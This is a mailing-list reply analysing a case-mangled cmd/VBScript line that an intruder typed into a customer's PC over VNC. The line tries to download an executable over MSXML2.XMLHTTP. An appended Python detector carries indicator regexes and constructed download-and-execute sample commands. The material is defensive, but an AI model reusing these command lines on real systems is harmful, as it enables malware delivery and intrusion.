Chris Curtis wrote:
> Hello All. This is very off topic, but I figure it won't kill anyone
> if I ask. There are a number of very smart cookies on this list, and
> I bet someone out there can enlighten me.
>
> Today I got a call from one of my customers who runs VNC for remote
> support access. She was working away, and suddenly her mouse
> started to move, it opened up a CMD session (it's really a DOS
> session, but we aren't supposed to know that Windows is just another
> DOS app are we!!!) and it typed the following:
>
> C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE
> nExt:F="L.eXe":SEt
> p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/
> NETSTAT
> On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct
> ("mSxmL2.xmLhttp"):p.OpEn"gEt",
> "HtTp://WwW.JmDoNgyI.CoM/
>
>
First off, this looks incomplete... and from what I can see wouldn't do
much...
It looks like it's attempting to use XMLHttp to retrieve an executable
file from that website. A lot of the commands it's using wouldn't do
anything under a cmd prompt, but would if it were using something like
CSCRIPT, to execute VBScript.
If you have the *exact* text typed into the cmd window (without
formatting changed, or even a screen shot), it might reveal more... I
would have expected to see some redirection of the ECHO command to a
temp file, then executing that file using CSCRIPT.
The & in the first line just makes it execute the next command (like &&
does in *NIX).
The next command being "echo xxx", where xxx looks like some VBScript
code, *but* some bits are missing, like closing quotes, etc.
> Now, I am not an XML guy, but it looks to me like this person was
> trying to use XML and download content from a likely infected
> website. I went to the website (I use a Mac, so I don't generally
> worry about getting a browser hack) and, you guessed it, it was a
> Chinese site. I googled the www.jmdongyi.com name but got no hits.
>
> I connected to her PC and found no strange connections to it at the
> time. I ran a malware, virus scan and it was clean also. I had her
> turn off vnc for now and explained to her how she could turn it on
> when she needs to allow someone access. Incidentally, she was using
> a non-dictionary password with alpha and numeric characters.
>
> My question is, what was the XML string actually trying to do?
>
> Thanks to all who offer assistance.
>
>
>
Either the version of VNC in use has a remotely exploitable bug, or it
was a "cracked" version that was installed, which allowed someone to
connect.
Hope that sheds some light on what was attempted...
Regards
--
Richard Patterson HelpQuick Limited
Tel: 0191 2582888 Fax: 0191 6408666
Jabber chat: [EMAIL PROTECTED]
Web: http://www.helpquick.co.uk
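A defender's illustration added to this thread (it is not code from either poster): the pattern Richard describes, a cmd line that uses `&` to chain `cd %TMP%` with an `echo` of VBScript carrying `On Error Resume Next` and `CreateObject("MSXML2.XMLHTTP")`, can be flagged from command-line logging by normalising case first (the mixed-case typing defeats naive exact-string matching) and then looking for the combination of indicators. The sample command lines below are constructed for the example; the host `example.invalid` is a placeholder and not the domain from the original message, and the indicator names and thresholds are the example's own choices.

```python
import re
from typing import Dict, List

# Indicator patterns, matched against a lower-cased, whitespace-collapsed
# command line so that mixed-case evasion (cREAtEOBjEct, HtTp) does not help.
INDICATORS = {
    "vbs_error_suppression": r"on error resume next",
    "xmlhttp_object": r"createobject\(\s*\"msxml2\.xmlhttp\"\s*\)",
    "http_get_request": r"\.open\s*\"get\"",
    "executable_filename": r"\"[a-z0-9_\-]+\.exe\"",
    "temp_dir_cd": r"\bcd\s+%tmp%",
    "remote_url": r"https?://[a-z0-9.\-]+",
    "output_redirect": r">\s*[^\s&]+\.vbs",
    "script_host": r"\b[cw]script(\.exe)?\b",
}

URL_RE = re.compile(r"https?://[a-z0-9.\-]+(?:/[^\s\"']*)?")


def normalize(cmdline: str) -> str:
    """Collapse whitespace and lower-case so case-mangled tokens match."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def split_cmd(cmdline: str) -> List[str]:
    """Split on cmd.exe's '&' command separator, ignoring '&' inside quotes."""
    parts, buf, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        if ch == "&" and not in_quote:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def analyze(cmdline: str) -> Dict[str, object]:
    """Return the indicators hit, any URLs, the chained commands and a verdict."""
    norm = normalize(cmdline)
    commands = split_cmd(norm)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, norm)]
    # An 'echo' whose argument is VBScript is the staging step Richard expected
    # (write the script to a temp file, then run it with cscript).
    if any(c.startswith("echo ") and
           re.search(r"createobject|on error resume next", c) for c in commands):
        hits.append("echo_carries_vbscript")
    if len(hits) >= 3:
        verdict = "download-and-execute"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {
        "indicators": sorted(hits),
        "urls": URL_RE.findall(norm),
        "commands": commands,
        "verdict": verdict,
    }


# Constructed samples (not captured data). The first mimics the mixed-case
# fragment quoted in the thread with a placeholder host; the second shows the
# echo-to-file-then-cscript staging Richard describes; the third is benign.
OBSERVED_STYLE = (
    'CD %TMP%&ECHO On ERROR RESUmE nExt:F="L.eXe":SEt '
    'p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt",'
    '"HtTp://ExAmPlE.InVaLiD/L.eXe"'
)
STAGED_SCRIPT = (
    'cd %TMP%&ECHO On Error Resume Next:Set p=CreateObject("MSXML2.XMLHTTP")'
    '>x.vbs&cscript //nologo x.vbs'
)
BENIGN = "dir /b"

if __name__ == "__main__":
    for sample in (OBSERVED_STYLE, STAGED_SCRIPT, BENIGN):
        result = analyze(sample)
        print(result["verdict"], result["indicators"], result["urls"])
```

Run against real telemetry this would sit on process-creation events for `cmd.exe`, `cscript.exe` and `wscript.exe`; the `commands` list is also handy for seeing how many steps an operator chained through a single line, and the `urls` list gives the blocklist candidate without having to eyeball the case-mangled text.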
_______________________________________________
sql-ledger-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sql-ledger-users